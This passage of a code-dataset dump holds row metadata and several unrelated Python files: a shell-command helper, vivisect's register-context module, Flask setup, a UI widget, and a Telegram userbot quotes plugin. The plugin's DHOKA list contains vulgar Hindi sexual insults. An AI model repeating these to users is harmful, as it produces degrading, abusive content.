print(original-later)
test -= 1 | 23.133333 | 39 | 0.414986 | 43 | 347 | 3.348837 | 0.465116 | 0.166667 | 0.152778 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020942 | 0.449568 | 347 | 15 | 40 | 23.133333 | 0.732984 | 0 | 0 | 0.133333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c49e67e8dbe87dd913b66006fd7f5daf6198c333 | 2,948 | py | Python | src/utils/Shell.py | vlab-cs-ucsb/quacky | c031577883550820e2586ce530e59eb30aeccc37 | [
"BSD-2-Clause"
] | 1 | 2022-02-28T18:10:29.000Z | 2022-02-28T18:10:29.000Z | src/utils/Shell.py | vlab-cs-ucsb/quacky | c031577883550820e2586ce530e59eb30aeccc37 | [
"BSD-2-Clause"
] | null | null | null | src/utils/Shell.py | vlab-cs-ucsb/quacky | c031577883550820e2586ce530e59eb30aeccc37 | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Mon Aug 18 22:20:01 2014
@author: baki
"""
import shlex
from subprocess import Popen, PIPE
from .Log import Log
class Shell:
def __init__(self, TAG=""):
self.log = Log(TAG=TAG)
self.current_process = None
self.process_output = None
def setTag(self, tag):
self.log.setTag(tag)
def runcmd(self, cmd, cwd=None, shell=False):
# self.log.v("cmd: {}\n with params: cwd={}, shell={}".format(cmd, cwd, shell))
args = shlex.split(cmd)
p = Popen(args, stdout=PIPE, stderr=PIPE, cwd=cwd, shell=shell)
out, err = p.communicate()
if out:
out = out.decode("ascii")
# self.log.v("cmd output: {}\n".format(out))
if err:
err = err.decode("ascii")
# self.log.v("cmd error: {}\n".format(err))
return out, err
def runcmdBgrnd(self, cmd, out=PIPE, cwd=None, shell=False):
assert self.current_process == None, "currently, one shell object supports only one background process"
self.log.v("cmd: {}\n with params: out={}, cwd={}, shell={}".format(cmd, out, cwd, shell))
redirect_to = out
if out is not PIPE:
assert self.process_output == None, "currently, one shell object supports only one background process"
redirect_to = open(out, "w")
args = shlex.split(cmd)
p = Popen(args, stdout=redirect_to, stderr=redirect_to, cwd=cwd, shell=shell)
self.current_process = p
self.process_output = redirect_to
return p
def kill(self, process=None):
if process is None:
process = self.current_process
process and process.kill()
self.process_output and self.process_output.close()
def terminate(self, process=None):
if process is None:
process = self.current_process
process and process.terminate()
self.process_output and self.process_output.close()
def runGrep(self, search, subject, options):
cmd = "grep {} \"{}\" {}".format(options, search, subject)
return self.runcmd(cmd)
def rm(self, name):
cmd = "rm {}".format(name)
return self.runcmd(cmd)
def rmdir(self, name):
cmd = "rmdir {}".format(name)
return self.runcmd(cmd)
def rmrdir(self, name):
cmd = "rm -r {}".format(name)
return self.runcmd(cmd)
def mv(self, src, dst):
cmd = "mv {} {}".format(src, dst)
return self.runcmd(cmd)
def cp(self, src, dst):
cmd = "cp -r {} {}".format(src, dst)
return self.runcmd(cmd)
def mkdir(self, name):
cmd = "mkdir {} -p".format(name)
return self.runcmd(cmd)
def clean(self, name):
self.rmrdir(name)
self.mkdir(name)
| 32.043478 | 119 | 0.557327 | 372 | 2,948 | 4.360215 | 0.236559 | 0.061036 | 0.073366 | 0.081998 | 0.446363 | 0.432799 | 0.405672 | 0.29963 | 0.217016 | 0.161529 | 0 | 0.006394 | 0.31038 | 2,948 | 91 | 120 | 32.395604 | 0.791441 | 0.080393 | 0 | 0.230769 | 0 | 0 | 0.093041 | 0 | 0 | 0 | 0 | 0 | 0.030769 | 1 | 0.215385 | false | 0 | 0.046154 | 0 | 0.415385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c4a64cd498868ef1b6019445d7127a1f346b9fe4 | 13,670 | py | Python | envi/registers.py | ConfusedMoonbear/vivisect | 8d6048037f85f745cd11923c6a8d662c150fe330 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2019-12-11T19:13:59.000Z | 2019-12-11T19:13:59.000Z | envi/registers.py | ConfusedMoonbear/vivisect | 8d6048037f85f745cd11923c6a8d662c150fe330 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | envi/registers.py | ConfusedMoonbear/vivisect | 8d6048037f85f745cd11923c6a8d662c150fe330 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | """
Similar to the memory subsystem, this is a unified way to
access information about objects which contain registers
"""
import envi.bits as e_bits
from envi.const import *
class InvalidRegisterName(Exception):
pass
class RegisterContext:
def __init__(self, regdef=(), metas=(), pcindex=None, spindex=None, srindex=None):
"""
Hand in a register definition which consists of
a list of (<name>, <width>) tuples.
"""
self.loadRegDef(regdef)
self.loadRegMetas(metas)
self.setRegisterIndexes(pcindex, spindex, srindex=srindex)
self._rctx_dirty = False
def getRegisterSnap(self):
"""
Use this to bulk save off the register state.
"""
return list(self._rctx_vals)
def setRegisterSnap(self, snap):
"""
Use this to bulk restore the register state.
NOTE: This may only be used under the assumption that the
RegisterContext has been initialized the same way
(like context switches in tracers, or emulaction snaps)
"""
self._rctx_vals = list(snap)
def isDirty(self):
"""
Returns true if registers in this context have been modififed
since their import.
"""
return self._rctx_dirty
def setIsDirty(self, bool):
self._rctx_dirty = bool
def setRegisterIndexes(self, pcindex, spindex, srindex=None):
self._rctx_pcindex = pcindex
self._rctx_spindex = spindex
self._rctx_srindex = srindex
def loadRegDef(self, regdef, defval=0):
"""
Load a register definition. A register definition consists
of a list of tuples with the following format:
(regname, regwidth)
NOTE: All widths in envi RegisterContexts are in bits.
"""
self._rctx_regdef = regdef # Save this for snaps etc..
self._rctx_names = {}
self._rctx_ids = {}
self._rctx_widths = []
self._rctx_vals = []
self._rctx_masks = []
for i, (name, width) in enumerate(regdef):
self._rctx_names[name] = i
self._rctx_ids[i] = name
self._rctx_widths.append(width)
self._rctx_masks.append((2**width)-1)
self._rctx_vals.append(defval)
def getRegDef(self):
return self._rctx_regdef
def loadRegMetas(self, metas, statmetas=None):
"""
Load a set of defined "meta" registers for this architecture. Meta
registers are defined as registers who exist as a subset of the bits
in some other "real" register. The argument metas is a list of tuples
with the following format:
(regname, regidx, reg_shift_offset, reg_width)
The given example is for the AX register in the i386 subsystem
regname: "ax"
reg_shift_offset: 0
reg_width: 16
Optionally a set of status meta registers can be loaded as well.
The argument is a list of tuples with the following format:
(regname, regidx, reg_shift_offset, reg_width, description)
"""
self._rctx_regmetas = metas
for name, idx, offset, width in metas:
self.addMetaRegister(name, idx, offset, width)
self._rctx_statmetas = statmetas
def addMetaRegister(self, name, idx, offset, width):
"""
Meta registers are registers which are really just directly
addressable parts of already existing registers (eax -> al).
To add a meta register, you give the name, the idx of the *real*
register, the width of the meta reg, and it's left shifted (in bits)
offset into the real register value. The RegisterContext will take
care of accesses after that.
"""
newidx = (offset << 24) + (width << 16) + idx
self._rctx_names[name] = newidx
self._rctx_ids[newidx] = name
def isMetaRegister(self, index):
return (index & 0xffff) != index
def _rctx_Import(self, sobj):
"""
Given an object with attributes with the same names as
registers in our context, populate our values from it.
NOTE: This also clears the dirty flag
"""
# On import from a structure, we are clean again.
self._rctx_dirty = False
for name,idx in self._rctx_names.items():
# Skip meta registers
if (idx & 0xffff) != idx:
continue
x = getattr(sobj, name, None)
if x != None:
self._rctx_vals[idx] = x
def _rctx_Export(self, sobj):
"""
Given an object with attributes with the same names as
registers in our context, set the ones he has to match
our values.
"""
for name,idx in self._rctx_names.items():
# Skip meta registers
if (idx & 0xffff) != idx:
continue
if hasattr(sobj, name):
setattr(sobj, name, self._rctx_vals[idx])
def getRegisterInfo(self, meta=False):
"""
Return an object which can be stored off, and restored
to re-initialize a register context. (much like snapshot
but it takes the definitions with it)
"""
regdef = self._rctx_regdef
regmeta = self._rctx_regmetas
pcindex = self._rctx_pcindex
spindex = self._rctx_spindex
snap = self.getRegisterSnap()
return (regdef, regmeta, pcindex, spindex, snap)
def setRegisterInfo(self, info):
regdef, regmeta, pcindex, spindex, snap = info
self.loadRegDef(regdef)
self.loadRegMetas(regmeta)
self.setRegisterIndexes(pcindex, spindex)
self.setRegisterSnap(snap)
def getRegisterName(self, index):
return self._rctx_ids.get(index,"REG%.8x" % index)
def getProgramCounter(self):
"""
Get the value of the program counter for this register context.
"""
return self.getRegister(self._rctx_pcindex)
def setProgramCounter(self, value):
"""
Set the value of the program counter for this register context.
"""
self.setRegister(self._rctx_pcindex, value)
def getStackCounter(self):
return self.getRegister(self._rctx_spindex)
def setStackCounter(self, value):
self.setRegister(self._rctx_spindex, value)
def hasStatusRegister(self):
'''
Returns True if this context is aware of a status register.
'''
if self._rctx_srindex == None:
return False
return True
def getStatusRegNameDesc(self):
'''
Return a list of status register names and descriptions.
'''
return [(name, desc) for name, idx, offset, width, desc in self._rctx_statmetas]
def getStatusRegister(self):
'''
Gets the status register for this register context.
'''
return self.getRegister(self._rctx_srindex)
def setStatusRegister(self, value):
'''
Sets the status register for this register context.
'''
self.setRegister(self._rctx_srindex, value)
def getStatusFlags(self):
'''
Return a dictionary of reg name and reg value for the meta registers
that are part of the status register.
'''
ret = {}
for name, idx, offset, width, desc in self._rctx_statmetas:
ret[name] = self.getRegisterByName(name)
return ret
def getRegisterByName(self, name):
idx = self._rctx_names.get(name)
if idx == None:
raise InvalidRegisterName("Unknown Register: %s" % name)
return self.getRegister(idx)
def setRegisterByName(self, name, value):
idx = self._rctx_names.get(name)
if idx == None:
raise InvalidRegisterName("Unknown Register: %s" % name)
self.setRegister(idx, value)
def getRegisterNames(self):
'''
Returns a list of the 'real' (non meta) registers.
'''
regs = [rname for rname, ridx in self._rctx_names.items()
if not self.isMetaRegister(ridx)]
return regs
def getRegisterNameIndexes(self):
'''
Return a list of all the 'real' (non meta) registers and their indexes.
Example: for regname, regidx in x.getRegisterNameIndexes():
'''
regs = [(rname, ridx) for rname, ridx in self._rctx_names.items()
if not self.isMetaRegister(ridx)]
return regs
def getRegisters(self):
"""
Get all the *real* registers from this context as a dictionary of name
value pairs.
"""
ret = {}
for name,idx in self._rctx_names.items():
if (idx & 0xffff) != idx:
continue
ret[name] = self.getRegister(idx)
return ret
def setRegisters(self, regdict):
"""
For any name value pairs in the specified dictionary, set the current
register values in this context.
"""
for name,value in regdict.items():
self.setRegisterByName(name, value)
def getRegisterIndex(self, name):
"""
Get a register index by name.
(faster to use the index multiple times)
"""
return self._rctx_names.get(name)
def getRegisterWidth(self, index):
"""
Return the width of the register which lives at the specified
index (width is always in bits).
"""
ridx = index & 0xffff
if ridx == index:
return self._rctx_widths[index]
width = (index >> 16) & 0xff
return width
def getRegister(self, index):
"""
Return the current value of the specified register index.
"""
ridx = index & 0xffff
value = self._rctx_vals[ridx]
if ridx != index:
value = self._xlateToMetaReg(index, value)
return value
def getMetaRegInfo(self, index):
'''
Return the appropriate realreg, shift, mask info
for the specified metareg idx (or None if it's not
meta).
Example:
real_reg, lshift, mask = r.getMetaRegInfo(x)
'''
ridx = index & 0xffff
if ridx == index:
return None
offset = (index >> 24) & 0xff
width = (index >> 16) & 0xff
mask = (2**width)-1
return ridx, offset, mask
def _xlateToMetaReg(self, index, value):
'''
Translate a register value to the meta register value
(used when getting a meta register)
'''
ridx = index & 0xffff
offset = (index >> 24) & 0xff
width = (index >> 16) & 0xff
mask = (2**width)-1
if offset != 0:
value >>= offset
return value & mask
def _xlateToNativeReg(self, index, value):
'''
Translate a register value to the native register value
(used when setting a meta register)
'''
ridx = index & 0xffff
width = (index >> 16) & 0xff
offset = (index >> 24) & 0xff
# FIXME is it faster to generate or look these up?
mask = (2 ** width) - 1
mask = mask << offset
# NOTE: basewidth is in *bits*
basewidth = self._rctx_widths[ridx]
basemask = (2 ** basewidth) - 1
# cut a whole in basemask at the size/offset of mask
finalmask = basemask ^ mask
curval = self._rctx_vals[ridx]
if offset:
value <<= offset
return value | (curval & finalmask)
def setRegister(self, index, value):
"""
Set a register value by index.
"""
self._rctx_dirty = True
ridx = index & 0xffff
# If it's a meta register index, lets mask it into
# the real thing...
if ridx != index:
value = self._xlateToNativeReg(index, value)
self._rctx_vals[ridx] = (value & self._rctx_masks[ridx])
def getRealRegisterNameByIdx(self, regidx):
"""
Returns the Name of the Containing register (in the case
of meta-registers) or the name of the register.
(by Index)
"""
return self.getRegisterName(regidx& RMETA_NMASK)
def getRealRegisterName(self, regname):
"""
Returns the Name of the Containing register (in the case
of meta-registers) or the name of the register.
"""
ridx = self.getRegisterIndex(regname)
if ridx != None:
return self.getRegisterName(ridx & RMETA_NMASK)
return regname
def addLocalEnums(l, regdef):
"""
Update a dictionary (or module locals) with REG_FOO index
values for all the base registers defined in regdef.
"""
for i,(rname,width) in enumerate(regdef):
l["REG_%s" % rname.upper()] = i
def addLocalStatusMetas(l, metas, statmetas, regname):
'''
Dynamically create data based on the status register meta register
definition.
Adds new meta registers and bitmask constants.
'''
for metaname, idx, offset, width, desc in statmetas:
# create meta registers
metas.append( (metaname, idx, offset, width) )
# create local bitmask constants (EFLAGS_%)
l['%s_%s' % (regname, metaname)] = 1 << offset # TODO: fix for arbitrary width
def addLocalMetas(l, metas):
"""
Update a dictionary (or module locals) with REG_FOO index
values for all meta registers defined in metas.
"""
for name, idx, offset, width in metas:
l["REG_%s" % name.upper()] = (offset << 24) | (width << 16) | idx
| 31.643519 | 88 | 0.59744 | 1,620 | 13,670 | 4.953086 | 0.201235 | 0.055833 | 0.017822 | 0.01346 | 0.2834 | 0.225324 | 0.218096 | 0.205882 | 0.185444 | 0.159771 | 0 | 0.006314 | 0.316459 | 13,670 | 431 | 89 | 31.716937 | 0.852419 | 0.327944 | 0 | 0.252577 | 0 | 0 | 0.007943 | 0 | 0 | 0 | 0.010922 | 0.00464 | 0 | 1 | 0.221649 | false | 0.005155 | 0.015464 | 0.020619 | 0.391753 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c4a6ac024777e5d5757393235c2f8a34ef55a681 | 531 | py | Python | services/nris-api/backend/app/extensions.py | parc-jason/mds | 8f181a429442208a061ed72065b71e6c2bd0f76f | [
"Apache-2.0"
] | null | null | null | services/nris-api/backend/app/extensions.py | parc-jason/mds | 8f181a429442208a061ed72065b71e6c2bd0f76f | [
"Apache-2.0"
] | null | null | null | services/nris-api/backend/app/extensions.py | parc-jason/mds | 8f181a429442208a061ed72065b71e6c2bd0f76f | [
"Apache-2.0"
] | null | null | null |
from flask_caching import Cache
from flask_jwt_oidc import JwtManager
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate, MigrateCommand
from flask import current_app
from elasticapm.contrib.flask import ElasticAPM
from .config import Config
from .helper import Api
apm = ElasticAPM()
db = SQLAlchemy()
migrate = Migrate()
jwt = JwtManager()
cache = Cache()
api = Api(
prefix=f'{Config.BASE_PATH}',
doc=f'{Config.BASE_PATH}/',
default='nris_api',
default_label='NRIS related operations')
| 23.086957 | 49 | 0.770245 | 71 | 531 | 5.619718 | 0.422535 | 0.112782 | 0.055138 | 0.075188 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145009 | 531 | 22 | 50 | 24.136364 | 0.878855 | 0 | 0 | 0 | 0 | 0 | 0.128302 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.444444 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
c4ad9991f367ca79cfc5f643798ad08df02746df | 905 | py | Python | pylbm_ui/widgets/message.py | pylbm/pylbm_ui | 0a7202ee6ee5424486ce6ade1d3b18d8139d4ffb | [
"BSD-3-Clause"
] | 3 | 2021-05-17T20:38:32.000Z | 2021-11-16T17:54:26.000Z | pylbm_ui/widgets/message.py | pylbm/pylbm_ui | 0a7202ee6ee5424486ce6ade1d3b18d8139d4ffb | [
"BSD-3-Clause"
] | 32 | 2021-04-29T13:27:13.000Z | 2021-07-01T07:22:58.000Z | pylbm_ui/widgets/message.py | pylbm/pylbm_ui | 0a7202ee6ee5424486ce6ade1d3b18d8139d4ffb | [
"BSD-3-Clause"
] | 1 | 2021-04-30T06:40:21.000Z | 2021-04-30T06:40:21.000Z | import ipyvuetify as v
class Message(v.Container):
def __init__(self, message):
self.message = v.Alert(
children=[f'{message}...'],
class_='primary--text'
)
super().__init__(
children=[
v.Row(
children=[
v.ProgressCircular(
indeterminate=True,
color='primary',
size=70,
width=4
)
],
justify='center'
),
v.Row(
children=[
self.message,
],
justify='center'
)
]
)
def update(self, new_message):
self.message.children = [f'{new_message}...'] | 26.617647 | 53 | 0.340331 | 58 | 905 | 5.12069 | 0.5 | 0.148148 | 0.121212 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007576 | 0.562431 | 905 | 34 | 53 | 26.617647 | 0.742424 | 0 | 0 | 0.3 | 0 | 0 | 0.066225 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.033333 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c4b3b6d76efc3c8c72713052f1e8b243b1695f31 | 265 | py | Python | yodl/__init__.py | brunolange/yodl | d9e957cacf1391fce3dfe9ac24e4fb434d14d8b0 | [
"MIT"
] | null | null | null | yodl/__init__.py | brunolange/yodl | d9e957cacf1391fce3dfe9ac24e4fb434d14d8b0 | [
"MIT"
] | null | null | null | yodl/__init__.py | brunolange/yodl | d9e957cacf1391fce3dfe9ac24e4fb434d14d8b0 | [
"MIT"
] | null | null | null | """yodl!
yodl provides a class decorator to build django models
from YAML configuration files
"""
from .decorators import yodl
from .io import yodlify
__author__ = "Bruno Lange"
__email__ = "blangeram@gmail.com"
__license__ = "MIT"
__all__ = ["yodl", "yodlify"]
| 18.928571 | 54 | 0.743396 | 34 | 265 | 5.323529 | 0.794118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150943 | 265 | 13 | 55 | 20.384615 | 0.804444 | 0.339623 | 0 | 0 | 0 | 0 | 0.261905 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
c4b535911ba95193b86d162ae29dd779c08ef75c | 26,047 | py | Python | userbot/plugins/quotes.py | aksr-aashish/FIREXUSERBOT | dff0b7bf028cb27779626ce523402346cc990402 | [
"MIT"
] | null | null | null | userbot/plugins/quotes.py | aksr-aashish/FIREXUSERBOT | dff0b7bf028cb27779626ce523402346cc990402 | [
"MIT"
] | 1 | 2022-01-09T11:35:06.000Z | 2022-01-09T11:35:06.000Z | userbot/plugins/quotes.py | aksr-aashish/FIREXUSERBOT | dff0b7bf028cb27779626ce523402346cc990402 | [
"MIT"
] | null | null | null | import random
import requests
from FIREX.utils import admin_cmd, edit_or_reply, sudo_cmd
from userbot.cmdhelp import CmdHelp
LOVESTR = [
"The best and most beautiful things in this world cannot be seen or even heard, but must be felt with the heart.",
"You know you're in love when you can't fall asleep because reality is finally better than your dreams.",
"Love recognizes no barriers. It jumps hurdles, leaps fences, penetrates walls to arrive at its destination full of hope.",
"Being deeply loved by someone gives you strength, while loving someone deeply gives you courage.",
"The real lover is the man who can thrill you by kissing your forehead or smiling into your eyes or just staring into space.",
"I swear I couldn't love you more than I do right now, and yet I know I will tomorrow.",
"When I saw you I fell in love, and you smiled because you knew it.",
"In all the world, there is no heart for me like yours. / In all the world, there is no love for you like mine.",
"To love or have loved, that is enough. Ask nothing further. There is no other pearl to be found in the dark folds of life.",
"If you live to be a hundred, I want to live to be a hundred minus one day, so I never have to live without you.",
"Some love stories aren't epic novels. Some are short stories. But that doesn't make them any less filled with love.",
"As he read, I fell in love the way you fall asleep: slowly, and then all at once.",
"I've never had a moment's doubt. I love you. I believe in you completely. You are my dearest one. My reason for life.",
"Do I love you? My god, if your love were a grain of sand, mine would be a universe of beaches.",
"I am who I am because of you.",
"I just want you to know that you're very special... and the only reason I'm telling you is that I don't know if anyone else ever has.",
"Remember, we're madly in love, so it's all right to kiss me any time you feel like it.",
"I love you. I knew it the minute I met you.",
"I loved her against reason, against promise, against peace, against hope, against happiness, against all discouragement that could be.",
"I love you not because of who you are, but because of who I am when I am with you.",
]
DHOKA = [
"Humne Unse Wafa Ki, Aur Dil Bhi Gya Toot, Wo Bhi Chinaal Nikli, Uski Maa ki Chut.",
"Dabbe Me Dabba, Dabbe Me Cake ..Tu Chutiya Hai Zara Seesha To Dekh.",
"Kaam Se Kaam Rakhoge Toh Naam Hoga, Randi Log Ke Chakkkar Me Padoge to Naam Badnaam Hoga.",
"Usne Kaha- Mah Lyf maH Rule, Maine Kaha Bhag BSDK , Tujhy Paida Karna hi Teri Baap ki Sabse Badi Vul.",
"Humse Ulajhna Mat, BSDK Teri Hasi Mita Dunga, Muh Me Land Daal Ke..Sari Hosiyaari Gand Se Nikal Dunga.",
"Aur Sunau Bhosdiwalo ..Kya Haal Hai?..Tumhare Sakal Se Zayda Toh Tumhare Gand Laal Hai!!",
"Pata Nhi Kya Kashish Hai Tumhare Mohabbat Me,Jab Bhi Tumhe Yaad Karta Hu Mera Land Khada Ho Jata Hai.",
"Konsa Mohabbat Kounsi Story, Gand Faad Dunga Agr Bolne Aayi Sorry!",
"Naam Banta Hai Risk Se, Chutiya Banta Hai IshQ Se.",
"Sun Be, Ab Tujhy Mere Zindegi Me Ane ka Koi Haq Nhi,,Aur Tu 1 Number Ki Randi Hai Isme KOi Saq Nhi.",
"Beta Tu Chugli Karna Chor De , Hum Ungli Karna Chor Dengy.",
]
METOOSTR = [
"Me too thanks",
"Haha yes, me too",
"Same lol",
"Me irl",
"Same here",
"Haha yes",
"Me rn",
]
GDNOON = [
"`My wishes will always be with you, Morning wish to make you feel fresh, Afternoon wish to accompany you, Evening wish to refresh you, Night wish to comfort you with sleep, Good Afternoon Dear!`",
"`With a deep blue sky over my head and a relaxing wind around me, the only thing I am missing right now is the company of you. I wish you a refreshing afternoon!`",
"`The day has come a halt realizing that I am yet to wish you a great afternoon. My dear, if you thought you were forgotten, you’re so wrong. Good afternoon!`",
"`Good afternoon! May the sweet peace be part of your heart today and always and there is life shining through your sigh. May you have much light and peace.`",
"`With you, every part of a day is beautiful. I live every day to love you more than yesterday. Wishing you an enjoyable afternoon my love!`",
"`This bright afternoon sun always reminds me of how you brighten my life with all the happiness. I miss you a lot this afternoon. Have a good time`!",
"`Nature looks quieter and more beautiful at this time of the day! You really don’t want to miss the beauty of this time! Wishing you a happy afternoon!`",
"`What a wonderful afternoon to finish you day with! I hope you’re having a great time sitting on your balcony, enjoying this afternoon beauty!`",
"`I wish I were with you this time of the day. We hardly have a beautiful afternoon like this nowadays. Wishing you a peaceful afternoon!`",
"`As you prepare yourself to wave goodbye to another wonderful day, I want you to know that, I am thinking of you all the time. Good afternoon!`",
"`This afternoon is here to calm your dog-tired mind after a hectic day. Enjoy the blessings it offers you and be thankful always. Good afternoon!`",
"`The gentle afternoon wind feels like a sweet hug from you. You are in my every thought in this wonderful afternoon. Hope you are enjoying the time!`",
"`Wishing an amazingly good afternoon to the most beautiful soul I have ever met. I hope you are having a good time relaxing and enjoying the beauty of this time!`",
"`Afternoon has come to indicate you, Half of your day’s work is over, Just another half a day to go, Be brisk and keep enjoying your works, Have a happy noon!`",
"`Mornings are for starting a new work, Afternoons are for remembering, Evenings are for refreshing, Nights are for relaxing, So remember people, who are remembering you, Have a happy noon!`",
"`If you feel tired and sleepy you could use a nap, you will see that it will help you recover your energy and feel much better to finish the day. Have a beautiful afternoon!`",
"`Time to remember sweet persons in your life, I know I will be first on the list, Thanks for that, Good afternoon my dear!`",
"`May this afternoon bring a lot of pleasant surprises for you and fills you heart with infinite joy. Wishing you a very warm and love filled afternoon!`",
"`Good, better, best. Never let it rest. Til your good is better and your better is best. “Good Afternoon`”",
"`May this beautiful afternoon fill your heart boundless happiness and gives you new hopes to start yours with. May you have lot of fun! Good afternoon dear!`",
"`As the blazing sun slowly starts making its way to the west, I want you to know that this beautiful afternoon is here to bless your life with success and peace. Good afternoon!`",
"`The deep blue sky of this bright afternoon reminds me of the deepness of your heart and the brightness of your soul. May you have a memorable afternoon!`",
"`Your presence could make this afternoon much more pleasurable for me. Your company is what I cherish all the time. Good afternoon!`",
"`A relaxing afternoon wind and the sweet pleasure of your company can make my day complete. Missing you so badly during this time of the day! Good afternoon!`",
"`Wishing you an afternoon experience so sweet and pleasant that feel thankful to be alive today. May you have the best afternoon of your life today!`",
"`My wishes will always be with you, Morning wish to make you feel fresh, Afternoon wish to accompany you, Evening wish to refresh you, Night wish to comfort you with sleep, Good afternoon dear!`",
"`Noon time – it’s time to have a little break, Take time to breathe the warmth of the sun, Who is shining up in between the clouds, Good afternoon!`",
"`You are the cure that I need to take three times a day, in the morning, at the night and in the afternoon. I am missing you a lot right now. Good afternoon!`",
"`I want you when I wake up in the morning, I want you when I go to sleep at night and I want you when I relax under the sun in the afternoon!`",
"`I pray to god that he keeps me close to you so we can enjoy these beautiful afternoons together forever! Wishing you a good time this afternoon!`",
"`You are every bit of special to me just like a relaxing afternoon is special after a toiling noon. Thinking of my special one in this special time of the day!`",
"`May your Good afternoon be light, blessed, enlightened, productive and happy.`",
"`Thinking of you is my most favorite hobby every afternoon. Your love is all I desire in life. Wishing my beloved an amazing afternoon!`",
"`I have tasted things that are so sweet, heard words that are soothing to the soul, but comparing the joy that they both bring, I’ll rather choose to see a smile from your cheeks. You are sweet. I love you.`",
"`How I wish the sun could obey me for a second, to stop its scorching ride on my angel. So sorry it will be hot there. Don’t worry, the evening will soon come. I love you.`",
"`I want you when I wake up in the morning, I want you when I go to sleep at night and I want you when I relax under the sun in the afternoon!`",
"`With you every day is my lucky day. So lucky being your love and don’t know what else to say. Morning night and noon, you make my day.`",
"`Your love is sweeter than what I read in romantic novels and fulfilling more than I see in epic films. I couldn’t have been me, without you. Good afternoon honey, I love you!`",
"`No matter what time of the day it is, No matter what I am doing, No matter what is right and what is wrong, I still remember you like this time, Good Afternoon!`",
"`Things are changing. I see everything turning around for my favor. And the last time I checked, it’s courtesy of your love. 1000 kisses from me to you. I love you dearly and wishing you a very happy noon.`",
"`You are sometimes my greatest weakness, you are sometimes my biggest strength. I do not have a lot of words to say but let you make sure, you make my day, Good Afternoon!`",
"`Every afternoon is to remember the one whom my heart beats for. The one I live and sure can die for. Hope you doing good there my love. Missing your face.`",
"`My love, I hope you are doing well at work and that you remember that I will be waiting for you at home with my arms open to pamper you and give you all my love. I wish you a good afternoon!`",
"`Afternoons like this makes me think about you more. I desire so deeply to be with you in one of these afternoons just to tell you how much I love you. Good afternoon my love!`",
"`My heart craves for your company all the time. A beautiful afternoon like this can be made more enjoyable if you just decide to spend it with me. Good afternoon!`",
]
CHASE_STR = [
"Where do you think you're going?",
"Huh? what? did they get away?",
"ZZzzZZzz... Huh? what? oh, just them again, nevermind.",
"`Get back here!`",
"`Not so fast...`",
"Look out for the wall!",
"Don't leave me alone with them!!",
"You run, you die.",
"`Jokes on you, I'm everywhere`",
"You're gonna regret that...",
"You could also try /kickme, I hear that's fun.",
"`Go bother someone else, no-one here cares.`",
"You can run, but you can't hide.",
"Is that all you've got?",
"I'm behind you...",
"You've got company!",
"We can do this the easy way, or the hard way.",
"You just don't get it, do you?",
"Yeah, you better run!",
"Please, remind me how much I care?",
"I'd run faster if I were you.",
"That's definitely the droid we're looking for.",
"May the odds be ever in your favour.",
"Famous last words.",
"And they disappeared forever, never to be seen again.",
'"Oh, look at me! I\'m so cool, I can run from a bot!" - this person',
"Yeah yeah, just tap /kickme already.",
"Here, take this ring and head to Mordor while you're at it.",
"eviral has it, they're still running...",
"Unlike Harry Potter, your parents can't protect you from me.",
"Fear leads to anger. Anger leads to hate. Hate leads to suffering. If you keep running in fear, you might "
"be the next Vader.",
"Multiple calculations later, I have decided my interest in your shenanigans is exactly 0.",
"eviral has it, they're still running.",
"Keep it up, not sure we want you here anyway.",
"You're a wiza- Oh. Wait. You're not Harry, keep moving.",
"NO RUNNING IN THE HALLWAYS!",
"Hasta la vista, baby.",
"Who let the dogs out?",
"It's funny, because no one cares.",
